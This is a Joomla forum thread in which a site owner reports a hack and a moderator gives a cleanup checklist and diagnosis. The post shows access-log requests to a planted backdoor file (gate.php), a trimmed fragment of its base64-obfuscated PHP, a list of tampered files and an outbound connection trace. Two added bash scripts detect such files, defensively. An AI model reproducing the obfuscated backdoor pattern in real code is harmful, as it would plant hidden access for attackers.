Hacked site

Discussion regarding Joomla! 2.5 security issues.

Moderators: mandville, General Support Moderators

earfoon
Joomla! Fledgling
Posts: 2
Joined: Tue May 20, 2014 11:52 am

Hacked site

Post by earfoon » Tue May 20, 2014 12:25 pm

Can someone help me to resolve this? I'm really new to this.

This is the log I got from my host after the hacking.

82.146.54.233 - - [19/May/2014:11:34:01 +0200] "GET /plugins/user/profile/profiles/gate.php?update HTTP/1.0" 200 266 "-" "-"
82.146.54.233 - - [19/May/2014:11:34:01 +0200] "GET /plugins/user/profile/profiles/gate.php HTTP/1.0" 200 257 "-" "-"
82.146.54.233 - - [19/May/2014:11:34:02 +0200] "GET /plugins/user/profile/profiles/gate.php?update HTTP/1.0" 200 266 "-" "-"

The coded file:


<?php $GLOBALS['_397785576_']=Array(base64_decode('' .'aW5' .'pX3' .'NldA=='),base64_decode('ZX' .'J' .'yb3J' .'fcmVwb3J0' .'aW5n'),base64_decode('c2V' .'0' .'X3RpbW' .'Vf' .'bG' .'ltaXQ='),base64_decode('YXJ' .'yk9S','V' .'XB'
.'kYX' .'Rl' .'I' .'E9L','ZmFpbGV' .'kI' .'HRvIHJ' .'lY2' .'VpdmUgZ2F0ZSBjb2' .'RlC'

List over files that were changed over 24H

./www/WEBSITE/cache/Gantry/0d3bfbb7061e2e1506de616565d1285a-cache-Gantry-e5afa4a2bad1cb370655469bf0dfcf23.php
./www/WEBSITE/cache/js-d41d8cd98f00b204e9800998ecf8427e.php
./www/WEBSITE/cache/js-8598b178a25554bb7374be106e3c5d82.php
./www/WEBSITE/cache/js-46a88695e52012b72f7a35f39511a7c5.php
./www/WEBSITE/cache/js-206d51e1937753b9a47fd2c6e079b29d.php
./www/WEBSITE/cache/js-d6b617d43d903a347e62e1d8f8edbaf5.php
./www/WEBSITE/cache/js-38d716b5110a0ee4ebc7d5bdfa28013e.php
./www/WEBSITE/cache/js-8fdf0f5578c8931724a4c064c635d8ef.php
./www/WEBSITE/cache/js-9bb622fe9e007f29b9be0e3865306230.php
./www/WEBSITE/cache/js-1cb1c720832853b3f64a06a99896eeb0.php
./www/WEBSITE/cache/js-00d6cc5dee3b67fd9c06f6c28e90ca51.php
./www/WEBSITE/cache/js-494107fc903bb31200a7f4be2bf2b6ec.php
./www/WEBSITE/cache/js-0b066290a73e19980e92c457d92c4468.php
./www/WEBSITE/cache/js-e1e1ef3102c558dacb7abc831d6e2765.php
./www/WEBSITE/cache/js-7679f0e1feaf187750fc73bb8b07cc2c.php
./www/WEBSITE/components/com_rokgallery/templates/detail/default/light/css-1013affb563a26f599faa441eb5b29a8.php
./www/WEBSITE/components/com_rokgallery/templates/detail/default/css-99fc08208762dc0b6555838ca7d57258.php
./www/WEBSITE/components/com_rokgallery/templates/gallery/grid-4col/light/css-4da729c93967af19815957f190a7b211.php
./www/WEBSITE/components/com_rokgallery/templates/gallery/grid-4col/css-ea751b7d4c0c0e1c9d5412c7ad87f108.php
./www/WEBSITE/joomla/logs/error.php
./www/WEBSITE/joomla/logs/rokcommon.php
./www/WEBSITE/joomla/logs/gantry.php
./www/WEBSITE/libraries/gantry/css/css-b825f3c52f788bffb336b70841e64d5d.php
./www/WEBSITE/libraries/gantry/css/css-902f0d294efd08672204c01d491eb919.php
./www/WEBSITE/libraries/gantry/css/css-41c297185ff29837536827e53ca722d0.php
./www/WEBSITE/media/com_hikashop/css/css-d3f58244aa2f9cd247515739ba186d79.php
./www/WEBSITE/media/system/css/css-d88325c26fccffc16fdcbe6895c17519.php
./www/WEBSITE/modules/mod_rokgallery/templates/grid/light/css-bc31b451fc22a2621376615cfdcf4ab6.php
./www/WEBSITE/modules/mod_rokgallery/templates/grid/css-e731e93d41587b2b0f552ba238cafbf0.php
./www/WEBSITE/modules/mod_rokgallery/templates/slideshow/light/css-a3de83ea265ec67ab243d47e6dfec3d8.php
./www/WEBSITE/modules/mod_rokgallery/templates/slideshow/css-14aa8dfa2caa63ef496008689684a8ed.php
./www/WEBSITE/plugins/content/bo_videojs/videojs/css-08d9a938fc801d9e38b7260f929a90aa.php
./www/WEBSITE/plugins/system/rokbox/assets/styles/css-0080410c4b23ad58fb14fc3c91b97c24.php
./www/WEBSITE/plugins/user/profile/profiles/gate.php
./www/WEBSITE/templates/rt_clarion/css/css-0697c68f08763c45b38aba72c1bdf97d.php
./www/WEBSITE/templates/rt_clarion/css/css-83e55d3a8e0452f1569abb37b924aa1f.php
./www/WEBSITE/templates/rt_clarion/css/css-846e37eaae2ec98a6af101399deb80ab.php
./www/WEBSITE/templates/rt_clarion/css/css-937e14d7ecf7291d90a2663929f7d463.php
./www/WEBSITE/templates/rt_clarion/css/css-9e836534c65ed9ed774845184a070283.php
./www/WEBSITE/templates/rt_clarion/css/css-a1f198f3b9390febc4e777c9ba97cd2a.php
./www/WEBSITE/templates/rt_clarion/css/css-b95d508c3453e157fd72411ea70c82d7.php
./www/WEBSITE/templates/rt_clarion/css/css-e3bd606d3a91a6de17517bcb5316aa57.php

They suspect this file:

./www/WEBSITE/plugins/user/profile/profiles/gate.php ?


EXTERNAL CALL, WHICH TAKES LONG TIME:

stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=100, ...}) = 0
socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("94.242.221.173")}, 16) = -1 EINPROGRESS (Operation now in progress)
clock_gettime(CLOCK_MONOTONIC, {1182710, 905011321}) = 0
poll([{fd=4, events=POLLOUT}], 1, 299997
Last edited by mandville on Tue May 20, 2014 1:55 pm, edited 1 time in total.
Reason: trimmed code, posting complete hack scripts is bad practice and may lead to legal issues
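
The two checks that the host's evidence in the post above suggests, as an added example that is not part of the original thread: recently changed PHP files that use the split-string `base64_decode` style seen in the trimmed `gate.php` excerpt, and access-log hits on PHP files requested directly. The function names, the regular expression and the directory list are assumptions of this example.

```bash
#!/usr/bin/env bash
# Added triage example (not from the thread).

# Print PHP files under ROOT that changed in the last 24 hours AND call
# base64_decode() on a string literal split into concatenated fragments,
# e.g. base64_decode('' .'aW5' .'pX3'), as in the gate.php excerpt.
recent_obfuscated_php() {
    root=$1
    # Bracket expressions ([(] and [.]) avoid backslash escaping in the shell.
    pattern="base64_decode[(]'[A-Za-z0-9+/=]*' *[.] *'"
    # -mtime -1 : modified less than 24 hours ago
    # grep -l  : print only the names of files that contain the pattern
    find "$root" -type f -name '*.php' -mtime -1 \
        -exec grep -lE "$pattern" {} +
}

# Read an Apache common/combined access log (file argument or stdin) and print
# "count client-ip path" for successful requests that reach a .php file
# directly inside directories that hold no normal page entry points.
# Assumption of this example: the directory list below; adjust it per site.
direct_php_hits() {
    awk '
        $9 == 200 {
            path = $7
            sub(/\?.*/, "", path)        # drop the query string
            if (path ~ /^\/(plugins|cache|logs|tmp|images)\/.*\.php$/)
                hits[$1 " " path]++
        }
        END { for (k in hits) print hits[k], k }
    ' "$@" | sort -rn
}
```

Run them as `recent_obfuscated_php /path/to/site` and `direct_php_hits access.log`; a match is a lead for manual inspection, since legitimate extensions can also ship encoded strings or their own PHP endpoints.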

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Hacked site

Post by mandville » Tue May 20, 2014 1:57 pm

It's more helpful to see the forum sticky called "before you post - read and action this" and run the FPA and post its output.


[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic. Use these links to download the FPA:
Download .tar.gz version or Download the .zip version NOTE: Do not download the FPA from any other website or links found on the Internet.

[ ] Ensure you have the latest version of Joomla for your version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list of recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files by

    - Create a new database and install without sample data to it (make sure it is the same version as the previous site).
    - Install the 3rd party extensions (including any custom template) to the new Joomla. (That ensures you have the files in place for the 3rd party extensions.)
    - Edit the configuration.php file of the new Joomla to connect to your original database.
    - Make a backup and update to the current full version of Joomla.

Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories. More detailed information can be found in the Security Checklist 7 document.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
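
One way to check the permission item of the checklist above across a whole site tree, as an added example that is not part of the original post: it reports anything world-writable, directories that are not 755, and files that are not 644, accepting either 444 or 644 for `configuration.php`. The function name and the output labels are assumptions of this example.

```bash
#!/usr/bin/env bash
# Added example (not from the thread): report deviations from the checklist's
# permission targets (directories 755, files 644, configuration.php 444 or
# 644, nothing world-writable such as 777).
perm_audit() {
    root=$1

    # Anything with the "other write" bit set (777, 666, 757, ...).
    # Symlinks are skipped because their own mode bits are not meaningful.
    find "$root" ! -type l -perm -0002 | sed 's/^/WORLD-WRITABLE /'

    # Directories that are not exactly 755 (world-writable ones were
    # already reported above, so they are excluded here).
    find "$root" -type d ! -perm 755 ! -perm -0002 | sed 's/^/DIR-NOT-755 /'

    # Regular files that are not exactly 644, except configuration.php.
    find "$root" -type f ! -name configuration.php \
        ! -perm 644 ! -perm -0002 | sed 's/^/FILE-NOT-644 /'

    # configuration.php may be read-only (444) or the normal file mode (644).
    find "$root" -type f -name configuration.php \
        ! -perm 444 ! -perm 644 ! -perm -0002 | sed 's/^/CONFIG-MODE /'
}
```

`perm_audit /path/to/site` only reports; correct each listed entry with `chmod` after confirming the file belongs to the site.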

earfoon
Joomla! Fledgling
Posts: 2
Joined: Tue May 20, 2014 11:52 am

Re: Hacked site

Post by earfoon » Wed May 21, 2014 6:38 am

Thank you Mandville.

Underneath you will see the outcome of the FPA:

Problem Description :: Forum Post Assistant (v1.2.4) : 20th May 2014 wrote:Hacked site
Forum Post Assistant (v1.2.4) : 20th May 2014 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.8-Stable (Ember) 8-November-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: web1266 (uid: 1/gid: 1) | Group: web1266 (gid: 1) | Valid For: 2.5
Configuration Options :: Offline: 1 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-55-server | Technology: x86_64 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/web1266/www/earfoon.no | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.2-1ubuntu4.24 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 22527 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 128M | Max. POST Size: 128M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M

MySQL Configuration :: Version: 5.0.51a-24+lenny5 (Client:5.1.73) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 20.95 MiB | #of Tables: 113
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.2-1ubuntu4.24) | date (5.3.2-1ubuntu4.24) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | bz2 () | calendar () | ctype () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | SPL (0.2) | standard (5.3.2-1ubuntu4.24) | posix () | Reflection ($Revision: 293036 $) | Phar (2.0.1) | shmop () | SimpleXML (0.1) | soap () | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.9.1) | cgi-fcgi () | curl () | gd () | imagick (2.1.1-rc1) | imap () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | sqlite3 (0.7-dev) | tidy (2.0) | xmlrpc (0.51) | xsl (0.1) | mhash () | ionCube Loader () | Zend Guard Loader () | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: Oldsite/ (777) | img/ (777) | joomla/ (777) | txt/ (777) |
Extensions Discovered :: wrote:Components :: SITE :: WF_AGGREGATOR_VIMEO_TITLE (2.2.7.2) | WF_AGGREGATOR_[youtube]_TITLE (2.2.7.2) | WF_FILESYSTEM_JOOMLA_TITLE (2.2.7.2) | WF_LINKS_JOOMLALINKS_TITLE (2.2.7.2) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.2.7.2) | WF_POPUPS_JCEMEDIABOX_TITLE (2.2.7.2) | WF_POPUPS_WINDOW_TITLE (2.2.7.2) | WF_LINK_SEARCH_TITLE (2.2.7.2) | WF_ANCHOR_TITLE (2.2.7.2) | WF_ARTICLE_TITLE (2.2.7.2) | WF_AUTOSAVE_TITLE (2.2.7.2) | WF_BROWSER_TITLE (2.2.7.2) | WF_CLEANUP_TITLE (2.2.7.2) | WF_CONTEXTMENU_TITLE (2.2.7.2) | WF_DIRECTIONALITY_TITLE (2.2.7.2) | WF_FULLSCREEN_TITLE (2.2.7.2) | WF_IMGMANAGER_TITLE (2.2.7.2) | WF_INLINEPOPUPS_TITLE (2.2.7.2) | WF_KITCHENSINK_TITLE (2.2.7.2) | WF_LAYER_TITLE (2.2.7.2) | WF_LINK_TITLE (2.2.7.2) | WF_MEDIA_TITLE (2.2.7.2) | WF_NONBREAKING_TITLE (2.2.7.2) | WF_PASTE_TITLE (2.2.7.2) | WF_PREVIEW_TITLE (2.2.7.2) | WF_PRINT_TITLE (2.2.7.2) | WF_SEARCHREPLACE_TITLE (2.2.7.2) | WF_SOURCE_TITLE (2.2.7.2) | WF_SPELLCHECKER_TITLE (2.2.7.2) | WF_STYLE_TITLE (2.2.7.2) | WF_TABLE_TITLE (2.2.7.2) | WF_TEXTCASE_TITLE (2.2.7.2) | WF_VISUALBLOCKS_TITLE (2.2.7.2) | WF_VISUALCHARS_TITLE (2.2.7.2) | WF_XHTMLXTRAS_TITLE (2.2.7.2) | com_mailto (2.5.0) | com_wrapper (2.5.0) |
Components :: ADMIN :: com_admin (2.5.0) | com_banners (2.5.0) | com_cache (2.5.0) | com_categories (2.5.0) | com_checkin (2.5.0) | com_config (2.5.0) | com_content (2.5.0) | com_cpanel (2.5.0) | com_finder (2.5.0) | Gantry (4.1.24) | Hikashop Module (1.0.0) | Hikashop Cart Module (1.0.0) | Hikashop Currency Switcher Mod (1.0.0) | Content - Hikashop Social Plug (1.0.0) | Hikashop History Plugin (1.0.0) | Hikashop User account Plugin (1.0.0) | Hikashop Validate free order P (1.0.0) | Hikashop AlertPay Payment Plug (1.0.0) | Hikashop SIPS ATOS Payment Plu (1.0.0) | Hikashop Authorize.net Payment (1.0.0) | Hikashop Bank Transfer Payment (1.0.0) | Hikashop WorldPay Business Gat (0.0.2) | Hikashop Worldpay Global Gatew (0.0.7) | Hikashop Bluepaid Payment Plug (1.0.0) | Hikashop CardSave Payment Plug (1.0.0) | Hikashop Check Payment Plugin (1.0.0) | Hikashop CyberMuth CIC Payment (1.0.0) | Hikashop Collect On Delivery P (1.0.0) | Hikashop Credit Card Payment P (1.0.0) | Hikashop ePay Payment Plugin (1.0.0) | Hikashop eWAY Payment Plugin (1.0.0) | Hikashop FirstData Payment Plu (1.0.0) | Hikashop Google Checkout Payme (1.0.0) | Hikashop HSBC Payment Plugin (1.0.0) | Hikashop Innovative Gateway Pa (1.0.0) | Hikashop iVeri Payment Plugin (1.0.0) | Hikashop Moneybookers Payment (1.0.0) | Hikashop PayJunction Payment P (1.0.0) | Hikashop Payment Express Payme (1.0.0) | Hikashop Paypal Payment Plugin (1.0.0) | Hikashop Paypal Pro Payment Pl (1.0.0) | Hikashop SagePay Payment Plugi (1.0.0) | Hikashop Servired Payment Plug (1.0.0) | Hikashop Western Union Payment (1.0.0) | Hikashop Australia Post eDeliv (1.0.0) | Hikashop Manual Shipping Plugi (1.0.0) | Hikashop UPS Shipping Plugin (1.0.0) | Search - Hikashop Categories/M (1) | Search - Hikashop Products (1) | Hikashop Registration Redirect (1.0.0) | User - HikaShop (1.0.0) | Hikashop - VirtueMart Fallback (1.0.0) | HikaShop (1.5.7) | com_installer (2.5.0) | Unknown (-) | Editor - JCE (2.2.7.2) | JCE File Browser (2.0.0) | 
plg_quickicon_jcefilebrowser (2.5.0) | JCE (2.2.7.2) | com_joomlaupdate (2.5.0) | com_languages (2.5.0) | com_login (2.5.0) | com_media (2.5.0) | com_menus (2.5.0) | com_messages (2.5.0) | com_modules (2.5.0) | com_newsfeeds (2.5.0) | com_plugins (2.5.0) | com_redirect (2.5.0) | RokCandy (2.0.0) | RokGallery (2.8) | com_search (2.5.0) | com_templates (2.5.0) | com_users (2.5.0) | com_weblinks (2.5.0) |

Modules :: SITE :: mod_articles_archive (2.5.0) | mod_articles_categories (2.5.0) | mod_articles_category (2.5.0) | mod_articles_latest (2.5.0) | mod_articles_news (2.5.0) | mod_articles_popular (2.5.0) | mod_banners (2.5.0) | mod_breadcrumbs (2.5.0) | mod_custom (2.5.0) | mod_feed (2.5.0) | mod_finder (2.5.0) | mod_footer (2.5.0) | FXPreview (1.0) | Hikashop Module (1.0.0) | Hikashop Cart Module (1.0.0) | Hikashop Currency Switcher Mod (1.0.0) | Images Crawler (2.0) | iNivoSlider (2.5.0) | mod_languages (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_random_image (2.5.0) | mod_related_items (2.5.0) | RokGallery Module (2.8) | RokNavMenu (2.0.7) | RokTabs (1.11) | RokTwittie (1.6) | mod_search (2.5.0) | mod_stats (2.5.0) | mod_syndicate (2.5.0) | mod_users_latest (2.5.0) | Vinaora Nivo Slider (2.5.2) | mod_weblinks (2.5.0) | mod_whosonline (2.5.0) | mod_wrapper (2.5.0) | MOD_ITPFBLIKEBOX (1.7) | RS Cool Mp3 Player (1.2) |
Modules :: ADMIN :: mod_custom (2.5.0) | mod_feed (2.5.0) | mod_latest (2.5.0) | mod_logged (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_multilangstatus (2.5.0) | mod_popular (2.5.0) | mod_quickicon (2.5.0) | mod_status (2.5.0) | mod_submenu (2.5.0) | mod_title (2.5.0) | mod_toolbar (2.5.0) | mod_version (2.5.0) |

Plugins :: SITE :: plg_authentication_gmail (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_captcha_recaptcha (2.5.0) | Content - bo:VideoJS (1.5.0) | plg_content_emailcloak (2.5.0) | plg_content_finder (2.5.0) | plg_content_geshi (2.5.0) | Content - Hikashop Social Plug (1.0.0) | plg_content_joomla (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_pagenavigation (2.5.0) | Content - RokBox (2.0.7) | plg_content_vote (2.5.0) | plg_editors-xtd_article (2.5.0) | plg_editors-xtd_image (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | plg_editors-xtd_readmore (2.5.0) | Button - RokCandy (2.0.0) | Button - RokGallery (2.8) | Button - RokBox (2.0.7) | plg_editors_codemirror (1.0) | Editor - JCE (2.2.7.2) | Editor - RokPad (2.0.4) | plg_editors_tinymce (3.5.4.1) | plg_extension_joomla (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_content (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_weblinks (2.5.0) | Hikashop History Plugin (1.0.0) | Hikashop User account Plugin (1.0.0) | Hikashop Validate free order P (1.0.0) | Hikashop AlertPay Payment Plug (1.0.0) | Hikashop SIPS ATOS Payment Plu (1.0.0) | Hikashop Authorize.net Payment (1.0.0) | Hikashop Bank Transfer Payment (1.0.0) | Hikashop WorldPay Business Gat (0.0.2) | Hikashop Worldpay Global Gatew (0.0.7) | Hikashop Bluepaid Payment Plug (1.0.0) | Hikashop CardSave Payment Plug (1.0.0) | Hikashop Check Payment Plugin (1.0.0) | Hikashop CyberMuth CIC Payment (1.0.0) | Hikashop Collect On Delivery P (1.0.0) | Hikashop Credit Card Payment P (1.0.0) | Hikashop ePay Payment Plugin (1.0.0) | Hikashop eWAY Payment Plugin (1.0.0) | Hikashop FirstData Payment Plu (1.0.0) | Hikashop Google Checkout Payme (1.0.0) | Hikashop HSBC Payment Plugin (1.0.0) | Hikashop Innovative Gateway Pa (1.0.0) | Hikashop iVeri Payment Plugin (1.0.0) | Hikashop Moneybookers Payment (1.0.0) | Hikashop PayJunction Payment P (1.0.0) | Hikashop 
Payment Express Payme (1.0.0) | Hikashop Paypal Payment Plugin (1.0.0) | Hikashop Paypal Pro Payment Pl (1.0.0) | Hikashop SagePay Payment Plugi (1.0.0) | Hikashop Servired Payment Plug (1.0.0) | Hikashop Western Union Payment (1.0.0) | Hikashop Australia Post eDeliv (1.0.0) | Hikashop Manual Shipping Plugi (1.0.0) | Hikashop UPS Shipping Plugin (1.0.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_jcefilebrowser (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_search_categories (2.5.0) | plg_search_contacts (2.5.0) | plg_search_content (2.5.0) | Search - Hikashop Categories/M (1) | Search - Hikashop Products (1) | plg_search_newsfeeds (2.5.0) | plg_search_weblinks (2.5.0) | System - BIGSHOT Google Analyt (1.7) | plg_system_cache (2.5.0) | plg_system_debug (2.5.0) | System - Gantry (4.1.24) | plg_system_highlight (2.5.0) | Hikashop Registration Redirect (1.0.0) | User - HikaShop (1.0.0) | plg_system_languagecode (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_log (2.5.0) | plg_system_logout (2.5.0) | plg_system_p3p (2.5.0) | plg_system_redirect (2.5.0) | plg_system_remember (2.5.0) | System - RokBox (2.0.7) | System - RokCandy (2.0.0) | System - RokCommon (3.1.6) | System - RokExtender (2.0.0) | System - RokGallery (2.8) | System - RokGZipper (1.0) | plg_system_sef (2.5.0) | Hikashop - VirtueMart Fallback (1.0.0) | manage.myJoomla.com Secure Plu (n/a) | plg_user_contactcreator (2.5.0) | plg_user_joomla (2.5.0) | plg_user_profile (2.5.0) |
Templates Discovered :: wrote:Templates :: SITE :: atomic (2.5.0) | beez5 (2.5.0) | beez_20 (2.5.0) | fjt001_j25 (2.5.0) | fjt004_j25 (2.5.0) | JSN_Teki_FREE (1.1.0) | rt_clarion (1.1) | themza_j16_03 (1.6.0) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Hacked site

Post by mandville » Wed May 21, 2014 11:00 am

Quick summary.
Joomla and various extensions out of date/vulnerable.
Folder permissions set wrong, allowing possible malicious uploads.
Follow checklist 7.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

